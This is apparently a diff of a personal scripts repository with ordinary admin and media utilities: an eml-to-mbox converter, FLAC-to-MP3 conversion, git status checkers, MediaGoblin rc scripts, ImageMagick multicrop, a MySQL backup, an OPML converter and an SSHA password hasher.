line = removeCR(line) if $switches["removeCRs"];
line = removeLF(line) if $switches["removeLFs"];
return line
end
# emls usually have CR+LF (DOS) line endings, Unix uses LF as a line break,
# so there's a hanging CR at the end of the line when viewed on Unix.
# This method will remove the next to the last character from a line
def removeCR(line)
line = line[0..-3]+line[-1..-1] if line[-2]==0xD
return line
end
# Similar to the above. This one is for Macs that use CR as a line break.
# So, remove the last char
def removeLF(line)
line = line[0..-2] if line[-1]==0xA
return line
end
end
#================#
# Helper methods #
#================#
# Converts: 'From "some one <aa@aa.aa>" <aa@aa.aa>' -> 'From aa@aa.aa'
def standardizeFrom(fromLine)
# Get indexes of last "<" and ">" in line
openIndex = fromLine.rindex('<')
closeIndex = fromLine.rindex('>')
if openIndex!=nil and closeIndex!=nil
fromLine = fromLine[0..4]+fromLine[openIndex+1..closeIndex-1]
end
# else leave as it is - it is either already well formed or is invalid
return fromLine
end
# Returns a mbox postmark formatted date.
# If timezone is unknown, it is skipped.
# mbox date format used is described here:
# http://www.broobles.com/eml2mbox/mbox.html
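# e.g. formMboxDate(time,"+0100") -> "Fri Jan 23 12:34:56 2004 +0100"
# (illustrative; with -yz the timezone is placed before the year)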
def formMboxDate(time,timezone)
if timezone==nil
return time.strftime("%a %b %d %H:%M:%S %Y")
else
if $switches["zoneYearOrder"]
return time.strftime("%a %b %d %H:%M:%S "+timezone.to_s+" %Y")
else
return time.strftime("%a %b %d %H:%M:%S %Y "+timezone.to_s)
end
end
end
# Extracts all switches from the command line and returns
# a hashmap with valid switch names as keys and booleans as values
# Moves real params to the beginning of the ARGV array
def extractSwitches()
switches = Hash.new(false) # All switches (values) default to false
i=0
while (ARGV[i]=~ /^-/) # while arguments are switches
if ARGV[i]=="-c"
switches["removeCRs"] = true
puts "\nWill fix lines ending with a CR"
elsif ARGV[i]=="-l"
switches["removeLFs"] = true
puts "\nWill fix lines beggining with a LF"
elsif ARGV[i]=="-s"
switches["noStandardFromLine"] = true
puts "\nWill use From and Date from mail headers in From_ line"
elsif ARGV[i]=="-yz"
switches["zoneYearOrder"] = true
puts "\nTimezone will be placed before the year in From_ line"
else
puts "\nUnknown switch: "+ARGV[i]+". Ignoring."
end
i = i+1
end
# Move real arguments to the beginning of the array
ARGV[0] = ARGV[i]
ARGV[1] = ARGV[i+1]
return switches
end
#===============#
# Main #
#===============#
$switches = extractSwitches()
# Extract specified directory with emls and the target archive (if any)
emlDir = "." # default if not specified
emlDir = ARGV[0] if ARGV[0]!=nil
mboxArchive = emlDir+"/archive.mbox" # default if not specified
mboxArchive = ARGV[1] if ARGV[1] != nil
# Show specified settings
puts "\nSpecified dir : "+emlDir
puts "Specified file: "+mboxArchive+"\n"
# Check that the dir exists
if FileTest.directory?(emlDir)
Dir.chdir(emlDir)
else
puts "\n["+emlDir+"] is not a directory (might not exist). Please specify a valid dir"
exit(0)
end
# Check if destination file exists. If yes allow user to select an option.
canceled = false
if FileTest.exist?(mboxArchive)
print "\nFile ["+mboxArchive+"] exists! Please select: [A]ppend [O]verwrite [C]ancel (default) "
sel = STDIN.gets.chomp
if sel == 'A' or sel == 'a'
aFile = File.new(mboxArchive, "a");
elsif sel == 'O' or sel == 'o'
aFile = File.new(mboxArchive, "w");
else
canceled = true
end
else
# File doesn't exist, open for writing
aFile = File.new(mboxArchive, "w");
end
if not canceled
puts
files = Dir["*.eml"]
if files.size == 0
puts "No *.eml files in this directory. mbox file not created."
aFile.close
File.delete(mboxArchive)
exit(0)
end
# For each .eml file in the specified directory do the following
files.each() do |x|
puts "Processing file: "+x
thisFile = FileInMemory.new()
File.open(x).each {|item| thisFile.addLine(item) }
lines = thisFile.getProcessedLines
if lines == nil
puts "WARN: File ["+x+"] doesn't seem to have a regular From: line. Not included in mbox"
else
lines.each {|line| aFile.puts line}
end
end
aFile.close
end

extract_ear.sh Executable file

@@ -0,0 +1,21 @@
#!/bin/sh
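# Usage (illustrative): extract_ear.sh app.ear /tmp/app_extracted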
EARFILE=$1
EXTR_DIR=$2
# check that the file and directory arguments are valid
# extract the given file into the directory
unzip "$EARFILE" -d "$EXTR_DIR"
# extract each jar, war and sar file into a temporary directory
for ar_file in "$EXTR_DIR"/*.?ar
do
TMP_DIR=$EXTR_DIR/.tmp
mkdir -p $TMP_DIR
# remove the jar/war/sar from the extraction directory and replace it
# with the directory of extracted files
unzip "$ar_file" -d "$TMP_DIR"
rm -f "$ar_file"
mv "$TMP_DIR" "$ar_file"
done

fix_wicd.sh Executable file

@@ -0,0 +1,13 @@
#!/bin/sh
# fixes a wicd bug: a line containing [] appears in the config file and
# crashes the daemon
# must be run with root privileges
# file to fix
CONF_FILE=/etc/wicd/wired-settings.conf
# back up the original
cp $CONF_FILE $CONF_FILE.bak
# remove the lines containing []
sed '/\[\]/d' $CONF_FILE.bak > $CONF_FILE
/etc/init.d/wicd restart

flac2mp3.sh Executable file

@@ -0,0 +1,62 @@
#!/bin/bash
# from http://www.linuxtutorialblog.com/post/solution-converting-flac-to-mp3
OUT_DIR=${OUT_DIR:="$HOME/tmp/mp3"}
[ ! -d ${OUT_DIR} ] && mkdir -p ${OUT_DIR}
# modify the lame options to your
# preference
lame_opts=" --vbr-new -V 2 -B 256 "
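# Usage (illustrative): ./flac2mp3.sh *.flac
# writes MP3s under $OUT_DIR/<artist>/<date>_<album>/ and copies the
# FLAC tags over with id3v2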
for x in "${@}"
do
FLAC=${x}
MP3=`basename "${FLAC%.flac}.mp3"`
[ -r "$FLAC" ] || { echo can not read file \"$FLAC\" >&1 ; exit 1 ; } ;
TITLE=""
TRACKNUMBER=""
GENRE=""
DATE=""
COMMENT=""
ARTIST=""
ALBUM=""
Title=""
Tracknumber=""
Genre=""
Date=""
Comment=""
Artist=""
Album=""
metaflac --export-tags-to=- "$FLAC" | sed 's/=\(.*\)/="\1"/' > $OUT_DIR/tmp.tmp
. $OUT_DIR/tmp.tmp
rm $OUT_DIR/tmp.tmp
[ -z "$TITLE" ] && TITLE="$Title"
[ -z "$TRACKNUMBER" ] && TRACKNUMBER="$Tracknumber"
[ -z "$GENRE" ] && GENRE="$Genre"
[ -z "$DATE" ] && DATE="$Date"
[ -z "$COMMENT" ] && COMMENT="$Comment"
[ -z "$ARTIST" ] && ARTIST="$Artist"
[ -z "$ALBUM" ] && ALBUM="$Album"
echo "Converting ${FLAC} to MP3 format"
OUTFILE="${OUT_DIR}/$ARTIST/${DATE}_$ALBUM/$MP3"
mkdir -p "${OUT_DIR}/$ARTIST/${DATE}_$ALBUM"
flac -c -d "$FLAC" | lame ${lame_opts} - "$OUTFILE"
id3v2 \
-a "$ARTIST" \
-A "$ALBUM" \
-t "$TITLE" \
-c "$COMMENT" \
-g "$GENRE" \
-y "$DATE" \
-T "$TRACKNUMBER" \
"$OUTFILE"
done

gitremotediff.sh Executable file

@@ -0,0 +1,34 @@
#!/bin/bash
# find diff between git working copy and remote
# directory containing working copies
DIR_ROOT=$1
if [[ ! $DIR_ROOT ]] || [[ ! -d $DIR_ROOT ]]; then
echo "Usage: $0 root_dir"
exit 1
fi
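# Example (illustrative): ./gitremotediff.sh ~/projects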
# remember work dir
ORIG_DIR=$PWD
# search working copies
for GITDIR in $( find $DIR_ROOT -name .git -type d ); do
WORKCOPY=${GITDIR%/.git}
cd $WORKCOPY
# check whether a remote repo exists
if [ -n "$( git remote)" ]; then
# fetch remote
git fetch -q
# files that differ
GITREMOTEDIFF=$( git diff --name-status remotes/origin/master )
if [ -n "$GITREMOTEDIFF" ];then
echo "$WORKCOPY not synchronised with remote"
echo "$GITREMOTEDIFF"
fi
fi
# restore work dir
cd $ORIG_DIR
done

gitworkreminder.sh Executable file

@@ -0,0 +1,29 @@
#!/bin/bash
# find uncommitted changes and untracked files in git working copies (under the specified directory)
# directory containing working copies
DIR_ROOT=$1
if [[ ! $DIR_ROOT ]] || [[ ! -d $DIR_ROOT ]]; then
echo "Usage: $0 root_dir"
exit 1
fi
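# Example (illustrative): ./gitworkreminder.sh ~/projects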
# remember work dir
ORIG_DIR=$PWD
# search working copies
for GITDIR in $( find $DIR_ROOT -name .git -type d ); do
WORKCOPY=${GITDIR%/.git}
cd $WORKCOPY
GITSTATUS=$( git status --porcelain )
if [ -n "$GITSTATUS" ]; then
echo "Untracked files in $WORKCOPY"
echo "$GITSTATUS"
echo
fi
# restore work dir
cd $ORIG_DIR
done

gmail_fingerprints.sh Executable file

@@ -0,0 +1,5 @@
#!/bin/sh
# MD5 fingerprint of the gmail IMAP certificate (for fetchmail)
openssl s_client -connect imap.gmail.com:993 -showcerts < /dev/null | openssl x509 -fingerprint -md5 -text | grep Fingerprint | awk -F= '{print $2}'
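# prints only the fingerprint, e.g. AB:CD:...:12 (illustrative), suitable for
# fetchmail's sslfingerprint option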

is_sync.sh Executable file

@@ -0,0 +1,10 @@
#!/bin/bash
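# The <img>/<click> tags below match the output format of a panel monitor
# widget such as xfce4-genmon-plugin (assumption based on the tag syntax).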
LOG_FILE=tmp/is_sync.log
# launched in the background; reads the result of the last run
if [ -s $LOG_FILE ]; then
echo "<click>zenity --text-info --filename=$LOG_FILE --title Synchronisation</click>"
echo "<img>/usr/share/icons/gnome/scalable/emblems/emblem-important-symbolic.svg</img>"
else
echo "<img>/usr/share/icons/gnome/scalable/emblems/emblem-default-symbolic.svg</img>"
fi

mgceleryd Normal file

@@ -0,0 +1,45 @@
#!/bin/sh
# PROVIDE: mgceleryd
# REQUIRE: LOGIN cleanvar
# KEYWORD: shutdown
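# Enable in /etc/rc.conf (standard rc.subr convention):
#   mgceleryd_enable="YES"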
. /etc/rc.subr
name="mgceleryd"
rcvar="mgceleryd_enable"
load_rc_config $name
: ${mgceleryd_enable:="NO"}
: ${mgceleryd_path:="/usr/local/www/photos.meutel.net/mediagoblin"}
: ${mgceleryd_user:="www"}
: ${mgceleryd_mgconfig:="$mgceleryd_path/mediagoblin_local.ini"}
: ${mgceleryd_config_module:="mediagoblin.init.celery.from_celery"}
: ${mgceleryd_logdir:="/var/log/mediagoblin"}
: ${mgceleryd_eggcache:="/usr/local/www/.python-eggs"}
pidfile="/var/run/${name}.pid"
required_files="$mgceleryd_mgconfig"
required_dirs="$mgceleryd_path $mgceleryd_path/bin $mgceleryd_logdir"
start_precmd="${name}_prestart"
mgceleryd_chdir=$mgceleryd_path
command="$mgceleryd_path/bin/celery"
command_args=" > $mgceleryd_logdir/${name}_start.log 2>&1 &"
command_interpreter="$mgceleryd_path/bin/python"
mgceleryd_flags=" worker --pidfile $pidfile -f ${mgceleryd_logdir}/${name}.log $mgceleryd_flags"
mgceleryd_prestart()
{
touch $pidfile
chown $mgceleryd_user $pidfile
MEDIAGOBLIN_CONFIG=$mgceleryd_mgconfig
export MEDIAGOBLIN_CONFIG
CELERY_CONFIG_MODULE=$mgceleryd_config_module
export CELERY_CONFIG_MODULE
PYTHON_EGG_CACHE="$mgceleryd_eggcache"
export PYTHON_EGG_CACHE
}
run_rc_command "$1"

mgpaster Normal file

@@ -0,0 +1,47 @@
#!/bin/sh
# PROVIDE: mgpaster
# REQUIRE: LOGIN cleanvar
# KEYWORD: shutdown
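# Enable in /etc/rc.conf (standard rc.subr convention):
#   mgpaster_enable="YES"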
. /etc/rc.subr
name="mgpaster"
rcvar="mgpaster_enable"
load_rc_config $name
: ${mgpaster_enable:="NO"}
: ${mgpaster_path:="/usr/local/www/photos.meutel.net/mediagoblin"}
: ${mgpaster_user:="www"}
: ${mgpaster_pasteini:="paste_local.ini"}
: ${mgpaster_logdir:="/var/log/mediagoblin"}
: ${mgpaster_eggcache:="/usr/local/www/.python-eggs"}
: ${mgpaster_host:="10.42.0.90"}
: ${mgpaster_port:="26543"}
: ${mgpaster_celery_eager:="false"}
pidfile="/var/run/${name}.pid"
required_files="$mgpaster_path/$mgpaster_pasteini"
required_dirs="$mgpaster_path $mgpaster_path/bin $mgpaster_logdir"
start_precmd="${name}_prestart"
mgpaster_chdir=$mgpaster_path
command="$mgpaster_path/bin/paster"
command_interpreter="$mgpaster_path/bin/python"
command_args=" > $mgpaster_logdir/${name}_start.log 2>&1"
mgpaster_flags=" serve $mgpaster_path/$mgpaster_pasteini --server-name=fcgi \
fcgi_host=$mgpaster_host fcgi_port=$mgpaster_port \
--pid-file $pidfile --log-file ${mgpaster_logdir}/${name}.log --daemon $mgpaster_flags"
mgpaster_prestart()
{
touch $pidfile
chown $mgpaster_user $pidfile
CELERY_ALWAYS_EAGER=$mgpaster_celery_eager
export CELERY_ALWAYS_EAGER
PYTHON_EGG_CACHE="$mgpaster_eggcache"
export PYTHON_EGG_CACHE
}
run_rc_command "$1"

multicrop Executable file

@@ -0,0 +1,402 @@
#!/bin/bash
#
# Revised by Fred Weinhaus ...................... revised 8/24/2010
# Revised by Anthony Thyssen to add -b option ... revised 8/24/2010
# Developed by Fred Weinhaus 1/30/2010 .......... revised 7/7/2010
#
# USAGE: multicrop [-c coords] [-b bcolor] [-f fuzzval] [-g grid] [-u unrotate] [-m mask] infile outfile
# USAGE: multicrop [-h or -help]
#
# OPTIONS:
#
# -c coords pixel coordinate to extract background color;
# may be expressed as gravity value (NorthWest, etc)
# or as "x,y" value; default is NorthWest=(0,0)
# -b bcolor background color to use instead of option -c;
# any valid IM color; default is to use option -c
# -f fuzzval fuzz value for separating background color;
# expressed as (integer) percent 0 to 100;
# default=10
# -g grid grid spacing in both x and y as percent of
# image width and height; used to locate images;
# integer>0; default=10;
# -u unrotate unrotate method; choices are 1 for -deskew,
# 2 for unrotate script and 3 for no unrotate;
# default=1
# -m mask mask presentation method; choices are view,
# save (to file) or output mask only; default
# is none of the above, just output the images
#
###
#
# NAME: MULTICROP
#
# PURPOSE: To crop and unrotate multiple images from a scanned image.
#
# DESCRIPTION: MULTICROP crops and unrotates multiple images from a scanned image.
# The images must be well separated so that background color shows between them.
# The process uses a floodfill technique based upon a seed coordinate and a fuzz
# value to separate the individual images from the background of the scan.
# The correct choice of fuzz factor is very important. If too small, the images
# will not be separated. If too large, parts of the outer area of the image
# containing similar colors will be lost and the image may be separated into
# multiple parts. There are two unrotate methods. The first uses the IM deskew
# function, but is limited to 5 degrees of rotation or less. The second uses my
# unrotate script. It allows much larger rotations, but will be slower. If
# using the second method, my unrotate script must be downloaded and installed.
#
# IMPORTANT: The images in the scanned file must be well separated in x and y
# so that their bounding boxes do not overlap. This is especially important
# if the images have a significant rotation.
#
# The output images will be named from the specified outfile and -0, -1,
# etc, will be appended before the .suffix.
#
# Arguments:
#
# -c coords ... COORDS is any location within the background (non-image) area
# for the algorithm to find the background color. It may be specified in terms
# of gravity parameters (NorthWest, North, NorthEast, East, SouthEast, South,
# SouthWest or West) or as a pixel coordinate "x,y". The default is the
# upper left corner = NorthWest = "0,0".
#
# -b bcolor ... BCOLOR is the background color to use for flood fill instead
# of extracting this color from the image. This is useful when an image has
# no borders with sub-images hard against the edges. Any valid IM color is
# allowed. The default is to use option -c.
#
# -f fuzzval ... FUZZVAL is the fuzz amount specified as an integer percent
# value between 0 and 100 (without the % sign). The correct choice of fuzz
# factor is very important. If too small, the images will not be separated.
# If too large, parts of the outer area of the image containing similar
# colors will be lost and the image may be separated into multiple parts.
# Typical values are probably between 5 and 20 percent. The default=10
#
# -g grid ... GRID is the grid spacing for testing points in the input image
# to see if they are background or image. The grid value is specified as an
# integer percent greater than 0 and less than 100 of the width and height
# of the input image. The default=10.
#
# -u unrotate ... UNROTATE is the unrotation method. Choices are: 1, 2 or 3.
# The default is unrotate=1, which is fast and uses the IM -deskew function,
# but is limited to images that are rotated no more than 5 degrees in the scan.
# Option unrotate=2 uses my unrotate script. It can handle larger rotations,
# but is slower. If using the latter method, my unrotate script must be
# downloaded and also installed so that it is available for this script to use.
# Option unrotate=3 makes no attempt to unrotate the images.
#
# -m mask ... MASK provides several options for reviewing the initial mask that
# is generated by the fuzz value. The choices are: view (display to X11 window),
# save (to disk) along with the images, or output (without processing the images).
# The default is to simply process the images without showing or saving the mask.
# If using the view mode, then processing will stop until the image is closed.
# But this allows you to then kill the script if the mask is not appropriate.
# A good approach is to use the output mode repeatedly with various fuzzvals
# until a reasonable mask is created. Note that the mask must separate the
# images, but the background can "eat" a little into the images so long as no
# full edge is lost or the image is split into multiple parts.
#
# NOTE: If using unrotate method 2, then my script, unrotate, is required
# as well.
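#
# EXAMPLE (illustrative, not from the original documentation):
#
# multicrop -f 15 scan.jpg photo.jpg
#
# reads scan.jpg and writes photo-0.jpg, photo-1.jpg, etc, one file per
# image found in the scan.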
#
# CAVEAT: No guarantee that this script will work on all platforms,
# nor that trapping of inconsistent parameters is complete and
# foolproof. Use At Your Own Risk.
#
######
#
# set default values
coords="0,0" # initial coord for finding background color
bcolor="" # initial background color
fuzzval=10 # fuzz amount in percent for making background transparent
grid=10 # grid spacing in percent image
mask="" # view, save, output
unrotate=1 # 1=deskew 2=unrotate script 3=none
# set directory for temporary files
dir="." # suggestions are dir="." or dir="/tmp"
# set up functions to report Usage and Usage with Description
PROGNAME=`type $0 | awk '{print $3}'` # search for executable on path
PROGDIR=`dirname $PROGNAME` # extract directory of program
PROGNAME=`basename $PROGNAME` # base name of program
usage1()
{
echo >&2 ""
echo >&2 "$PROGNAME:" "$@"
sed >&2 -n '/^###/q; /^#/!q; s/^#//; s/^ //; 4,$p' "$PROGDIR/$PROGNAME"
}
usage2()
{
echo >&2 ""
echo >&2 "$PROGNAME:" "$@"
sed >&2 -n '/^######/q; /^#/!q; s/^#*//; s/^ //; 4,$p' "$PROGDIR/$PROGNAME"
}
# function to report error messages
errMsg()
{
echo ""
echo $1
echo ""
usage1
exit 1
}
# function to test for minus at start of value of second part of option 1 or 2
checkMinus()
{
test=`echo "$1" | grep -c '^-.*$'` # returns 1 if match; 0 otherwise
[ $test -eq 1 ] && errMsg "$errorMsg"
}
# test for correct number of arguments and get values
if [ $# -eq 0 ]
then
# help information
echo ""
usage2
exit 0
elif [ $# -gt 14 ]
then
errMsg "--- TOO MANY ARGUMENTS WERE PROVIDED ---"
else
while [ $# -gt 0 ]
do
# get parameters
case "$1" in
-h|-help) # help information
echo ""
usage2
;;
-f) # fuzzval
shift # to get the next parameter
# test if parameter starts with minus sign
errorMsg="--- INVALID FUZZVAL SPECIFICATION ---"
checkMinus "$1"
fuzzval=`expr "$1" : '\([0-9]*\)'`
[ "$fuzzval" = "" ] && errMsg "--- FUZZVAL=$fuzzval MUST BE A NON-NEGATIVE INTEGER VALUE (with no sign) ---"
fuzzvaltestA=`echo "$fuzzval < 0" | bc`
fuzzvaltestB=`echo "$fuzzval > 100" | bc`
[ $fuzzvaltestA -eq 1 -o $fuzzvaltestB -eq 1 ] && errMsg "--- FUZZVAL=$fuzzval MUST BE A NON-NEGATIVE INTEGER VALUE BETWEEN 0 AND 100 ---"
;;
-c) # coords
shift # to get the next parameter
# test if parameter starts with minus sign
errorMsg="--- INVALID COORDS SPECIFICATION ---"
checkMinus "$1"
coords=$1
# further testing done later
;;
-b) # coords
shift # to get the next parameter
# test if parameter starts with minus sign
errorMsg="--- INVALID COORDS SPECIFICATION ---"
checkMinus "$1"
bcolor=$1
;;
-g) # grid
shift # to get the next parameter
# test if parameter starts with minus sign
errorMsg="--- INVALID GRID SPECIFICATION ---"
checkMinus "$1"
grid=`expr "$1" : '\([0-9]*\)'`
[ "$grid" = "" ] && errMsg "--- GRID=$grid MUST BE A NON-NEGATIVE INTEGER VALUE (with no sign) ---"
gridtestA=`echo "$grid <= 0" | bc`
gridtestB=`echo "$grid >= 100" | bc`
[ $gridtestA -eq 1 -o $gridtestB -eq 1 ] && errMsg "--- GRID=$grid MUST BE A NON-NEGATIVE INTEGER VALUE LARGER THAN 0 AND SMALLER THAN 100 ---"
;;
-u) # unrotate
shift # to get the next parameter
# test if parameter starts with minus sign
errorMsg="--- INVALID UNROTATE SPECIFICATION ---"
checkMinus "$1"
unrotate=`expr "$1" : '\([0-9]\)'`
[ $unrotate -lt 1 -o $unrotate -gt 3 ] && errMsg "--- UNROTATE=$unrotate MUST BE EITHER 1, 2 OR 3 ---"
;;
-m) # mask
shift # to get the next parameter
# test if parameter starts with minus sign
errorMsg="--- INVALID MASK SPECIFICATION ---"
checkMinus "$1"
mask=`echo "$1" | tr "[:upper:]" "[:lower:]"`
[ "$mask" != "view" -a "$mask" != "save" -a "$mask" != "output" ] && errMsg "--- MASK=$mask MUST BE EITHER VIEW, SAVE OR OUTPUT ---"
;;
-) # STDIN and end of arguments
break
;;
-*) # any other - argument
errMsg "--- UNKNOWN OPTION ---"
;;
*) # end of arguments
break
;;
esac
shift # next option
done
# get infile and outfile
infile=$1
outfile=$2
fi
# test if both bcolor and coords specified at the same time
if [ "X$bcolor" != "X" -a "X$coods" != "X" ]; then
errMsg "--- BACKGROUND COLOR AND COODINATES CAN NOT BE USED TOGETHER ---"
fi
# test that infile provided
[ "$infile" = "" ] && errMsg "NO INPUT FILE SPECIFIED"
# test that outfile provided
[ "$outfile" = "" ] && errMsg "NO OUTPUT FILE SPECIFIED"
# set up temp file
tmpA1="$dir/multicrop_1_$$.mpc"
tmpB1="$dir/multicrop_1_$$.cache"
tmpA2="$dir/multicrop_2_$$.mpc"
tmpB2="$dir/multicrop_2_$$.cache"
tmpA3="$dir/multicrop_3_$$.mpc"
tmpB3="$dir/multicrop_3_$$.cache"
tmpA4="$dir/multicrop_4_$$.mpc"
tmpB4="$dir/multicrop_4_$$.cache"
tmpA5="$dir/multicrop_5_$$.mpc"
tmpB5="$dir/multicrop_5_$$.cache"
trap "rm -f $tmpA1 $tmpB1 $tmpA2 $tmpB2 $tmpA3 $tmpB3 $tmpA4 $tmpB4 $tmpA5 $tmpB5; exit 0" 0
trap "rm -f $tmpA1 $tmpB1 $tmpA2 $tmpB2 $tmpA3 $tmpB3 $tmpA4 $tmpB4 $tmpA5 $tmpB5; exit 1" 1 2 3 15
# read the input image into the temp files and test validity.
convert -quiet -regard-warnings "$infile" +repage "$tmpA1" ||
errMsg "--- FILE $infile1 DOES NOT EXIST OR IS NOT AN ORDINARY FILE, NOT READABLE OR HAS ZERO SIZE ---"
# get output filename and suffix
outnameArr=(`echo "$outfile" | sed -n 's/^\(.*\)[.]\([^.]*\)$/\1 \2/p'`)
outname="${outnameArr[0]}"
suffix="${outnameArr[1]}"
#echo "outname=$outname"
#echo "suffix=$suffix"
# get image width and height
width=`identify -ping -format "%w" $tmpA1`
height=`identify -ping -format "%h" $tmpA1`
# get color at user specified location
if [ "X$bgcolor" != "X" ]; then
coords="0,0"
else
widthm1=`convert xc: -format "%[fx:$width-1]" info:`
heightm1=`convert xc: -format "%[fx:$height-1]" info:`
midwidth=`convert xc: -format "%[fx:round(($width-1)/2)]" info:`
midheight=`convert xc: -format "%[fx:round(($height-1)/2)]" info:`
coords=`echo "$coords" | tr "[:upper:]" "[:lower:]"`
case "$coords" in
''|nw|northwest) coords="0,0" ;;
n|north) coords="$midwidth,0" ;;
ne|northeast) coords="$widthm1,0" ;;
e|east) coords="$widthm1,$midheight" ;;
se|southeast) coords="$widthm1,$heightm1" ;;
s|south) coords="$midwidth,$heightm1" ;;
sw|southwest) coords="0,$heightm1" ;;
w|west) coords="0,$midheight" ;;
[0-9]*,[0-9]*) coords=$coords ;;
*) errMsg "--- INVALID COORDS ---" ;;
esac
bgcolor=`convert $tmpA1 -format "%[pixel:u.p{$coords}]" info:`
fi
#echo "bgcolor=$bgcolor"
# get grid spacing
wg=`convert xc: -format "%[fx:round($grid*$width/100)]" info:`
hg=`convert xc: -format "%[fx:round($grid*$height/100)]" info:`
num=`convert xc: -format "%[fx:round(100/$grid) - 2]" info:`
#echo "width=$width; height=$height; wg=$wg; hg=$hg; num=$num"
# add a border, and flood fill from all edges inward
convert $tmpA1 -fuzz ${fuzzval}% -fill none \
-bordercolor $bgcolor -border 1x1 \
-draw "matte $coords floodfill" \
-shave 1x1 -fill red +opaque none \
$tmpA2
if [ "$mask" = "view" ]; then
display $tmpA2
elif [ "$mask" = "save" ]; then
convert $tmpA2 ${outname}_mask.gif
elif [ "$mask" = "output" ]; then
convert $tmpA2 ${outname}_mask.gif
exit 0
fi
# set up for unrotate 1 or 3
if [ $unrotate -eq 1 ]; then
derotate="-deskew 40%"
elif [ $unrotate -eq 3 ]; then
derotate=""
fi
echo ""
# loop over grid and floodfill and trim to get individual mask for each image
k=0
y=0
for ((j=0;j<=$num;j++))
do
x=0
y=$(($y + $hg))
for ((i=0;i<=$num;i++))
do
x=$(($x + $wg))
# test if found color other than "none" (i.e. red)
testcolor=`convert $tmpA2 -channel rgba -alpha on -format \
"%[fx:u.p{$x,$y}=="none"?0:1]" info:`
# echo "$x $y $testcolor"
if [ $testcolor -eq 1 ]; then
echo "Processing Image $k"
# Take red and none mask.
# Floodfill the local red region with white.
convert $tmpA2 -channel rgba -alpha on -fill "white" \
-draw "color $x,$y floodfill" $tmpA3
# Fill anything not white with transparency and
# turn transparency off so black.
# Then clone and trim to bounds of white.
# Then fill any black with white.
# Then flatten back onto white and black image so that any white
# areas eaten away are filled with white.
# Note flatten uses the virtual canvas left by -trim so that it
# goes back into the right location.
convert \( $tmpA3 -channel rgba -alpha on \
-fill none +opaque white -alpha off \) \
\( +clone -trim -fill white -opaque black -write $tmpA5 \) \
-flatten $tmpA4
# Print size and page geometry
identify -ping -format " Size: %wx%h\n Page Geometry: %g" $tmpA5
# Composite the black and white mask onto the original scan.
# Then trim and deskew/unrotate to make the output.
if [ $unrotate -eq 1 -o $unrotate -eq 3 ]; then
convert $tmpA1 $tmpA4 -compose multiply -composite \
-fuzz ${fuzzval}% -trim -background "$bgcolor" $derotate \
-compose over -bordercolor "$bgcolor" -border 2 -trim +repage \
${outname}-${k}.${suffix}
elif [ $unrotate -eq 2 ]; then
convert $tmpA1 $tmpA4 -compose multiply -composite \
-fuzz ${fuzzval}% -trim miff:- | \
unrotate -f ${fuzzval}% - ${outname}-${k}.${suffix}
fi
# Fill the selected photo area in the red/none mask with none
# for use with next coordinate so that it does not find it again.
convert $tmpA3 -channel rgba -alpha on -fill none -opaque white $tmpA2
k=$(($k + 1))
fi
done
done
echo ""
exit 0

mysql_backup.sh Normal file

@@ -0,0 +1,3 @@
#!/bin/bash
# back up the gallery3 mysql database
mysqldump -Q --add-drop-table gallery3 > ~/mysql/mysql_gallery3_$(date +%Y%m%d).sql

newmail Executable file

Binary file not shown.

newmail_ol.sh Executable file

@@ -0,0 +1,8 @@
#!/bin/bash
# source newmail: http://code.burningsoda.com/newmail
# https://github.com/roblillack/newmail/
# print Maildir folders containing unread mails with count, on one line
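# output looks like "INBOX(2) lists(5) RSS/news(3)" (illustrative, assuming
# newmail prints "<count> <folder>" per line)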
newmail .mail 2>/dev/null | grep -v archives | awk '{print $2"("$1")"}' | tr '\n' ' '
newmail .mail/RSS 2>/dev/null | grep -v archives | awk '{print "RSS/"$2"("$1")"}' | tr '\n' ' '

opml2feed.pl Executable file

@@ -0,0 +1,81 @@
#!/usr/bin/perl -w
# ########################################################################
# This program converts the contents of an OPML file to the format
# used by feed2imap. You could, for example, export an OPML file from
# Google Reader and convert it to a .feed2imaprc file.
#
# #########################################################################
# This file is part of opml2feed
#
# opml2feed is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# opml2feed is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with opml2feed. If not, see <http://www.gnu.org/licenses/>.
# http://www.gnu.org/licenses/agpl-3.0.html
# #########################################################################
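# Example (illustrative):
#   ./opml2feed.pl google-reader-subscriptions.xml .feed2imaprc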
use strict;
use XML::Twig;
use Data::Dumper;
use URI::Escape;
binmode STDOUT, ":utf8";
my $imap_username = 'rss@example.com';
my $imap_password = 'myultracoolpassword';
my $imap_server = 'imap.example.com';
my $imap_base = 'INBOX.Feeds';
#my $maildir_base = '/home/meutel/.mail/feeds';
my $maildir_base = '/home/meutel/tmp/feeds';
# You shouldn't need to change anything after here - If you do please contribute back.
$imap_username = uri_escape_utf8( $imap_username );
$imap_password = uri_escape_utf8( $imap_password );
my $title_parent = "";
my $opmlfile= $ARGV[0] || 'google-reader-subscriptions.xml';
my $feed2imapfile= $ARGV[1] || '.feed2imaprc';
die "ERROR: $opmlfile is missing" unless -e $opmlfile;
die "ERROR: $feed2imapfile already exists" if -e $feed2imapfile;
open FH, ">>:utf8", $feed2imapfile or die "can't open '$feed2imapfile': $!";
print FH "feeds:\n";
my $twig= new XML::Twig(
twig_handlers =>
{ outline => \&outline }
);
$twig->parsefile( $opmlfile);
close FH;
sub outline
{ my( $twig, $outline)= @_;
$title_parent = $outline->parent->att( 'text') || "#" ;
if ( $title_parent !~ /^\#/ )
{
my $title = $outline->att( 'text');
$title =~ s/[^a-zA-Z0-9_ .]*//g;
$title =~ s/ {1,}/ /g;
$title_parent =~ s/[^a-zA-Z0-9_ .]*//g;
$title_parent =~ s/ /_/g;
my $xmlUrl = $outline->att( 'xmlUrl');
print FH " - name: ${title}\n";
print FH " url: ${xmlUrl}\n";
print FH " target: maildir://${maildir_base}/${title_parent}\n";
#print FH " target: imap://${imap_username}:${imap_password}\@${imap_server}/${imap_base}.${title_parent}\n";
print FH " include-images: true\n\n";
}
}

pass_ssha_salt.py Executable file

@@ -0,0 +1,4 @@
#!/usr/bin/env python
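# Prints an LDAP-style {SSHA} hash (base64 of SHA-1 digest plus salt) of a
# password read from the terminal, e.g. for an OpenLDAP userPassword value.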
import base64, getpass, hashlib, os
salt = os.urandom(8) # edit the length as you see fit
print '{SSHA}' + base64.b64encode(hashlib.sha1(getpass.getpass() + salt).digest() + salt)

pluzz Executable file

